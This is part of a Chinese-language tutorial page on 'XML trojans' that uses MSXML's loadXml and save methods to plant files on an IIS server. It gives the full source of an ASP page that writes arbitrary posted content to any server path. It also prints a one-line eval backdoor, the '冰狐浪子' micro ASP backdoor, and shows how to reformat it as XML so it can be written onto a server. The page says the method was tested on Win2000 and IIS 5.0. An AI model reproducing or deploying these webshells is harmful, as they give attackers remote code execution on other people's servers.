XML木马研究

6.数据中不能含有"<" ">"“&”符号
在代码中可以使用 "< "与 "> "代替"<" ">"符号

这们来详细了解一下这几个方法吧
xmlDoc.loadXml(xmlString) 这是用XML的LOAD方法来加载一段XML DOCUMENT到对象中,这里加载的是"xmlString"
注意：在这一个字符串中一定要满足XML语言的要求（在文章前面已经写过），如果不按照的话只能创建一个空的文件，有些读者写入不成功就是因为这一个原因。

xmlDoc.save(server.mappath("test.htm")) 这是把上一句的内容写入"test.htm"这一个文件。
XMLname.save(response) 这种方法中，MSXML作为一个ISTEAM接口，save方法使得MSXML在Response对象中查找MSXML的流接口，然后便用这个接口，将文档直接送到请求用户的流中。
server.mappath是按照相对路径写入，如果要用绝对路径就用xmlDoc.save("test.htm")

现在我们看一下木马的源程序
<%on error resume next%>
<form id="form1" name="form1" method="post" action=''''>
//创建一个提交表单
<p>木马内容</p>
<p><textarea name="flashboy" cols="80" rows="10"></textarea></p>
//创建一个文本框
<p>路径</p>
<p><input name="textfield" type="text" size="50" /></p>
<p><input type="submit" name="Submit" value="提交" /></p></form>
<p><%Response.write "本文件绝对路径"%>
<%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%></p>
//获取本文件的绝对路径
<%
dim xmlString
//创建xmlString,默认为字符串
dim xmlDoc
//创建xmlDoc
xmlString= Request("flashboy")
//取得文本框中的数据
set xmlDoc = server.createObject("Msxml2.DOMDocument")
//定义xmlDoc属于Msxml2.DOMDocument
xmlDoc.loadXml(xmlString)
//加载xmlString到对象中
f=Request("textfield")
//取出输入的文件路径
xmlDoc.save(f)
//保存xmlDoc.loadXml到输入的文件路径中
set xmlDoc=nothing
//清空xmlDoc
%>

测试木马
我们就用冰狐浪子微型ASP后门2.0 来测试一下吧
我们看看源码
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>try{eval(Request.form('#')+'')}catch(e){}</SCRIPT>
是不是不符合我们刚刚说的XML规范？
我们来动手改一下吧
RUNAT=SERVER LANGUAGE=JAVASCRIPT 这两个属性值没有引号引着，我们打他改成
RUNAT= " SERVER " LANGUAGE= " JAVASCRIPT "
整个ASP木马就成了
<SCRIPT RUNAT="SERVER" LANGUAGE="JAVASCRIPT">try{eval(Request.form('#')+'')}catch(e){}</SCRIPT>
现在可以把他写入服务器了。

顺便说一下,如果要写入任意的字符串，如FLASHBOY，直接写是写不进去的，因为XML是须要节点的，可以这样写<a> FLASHBOY</a> <b>FLASHBOY</b> <c>FLASHBOY</c>

本文在WIN2000+IIS 5.0 测试通过.

上一页  [1] [2]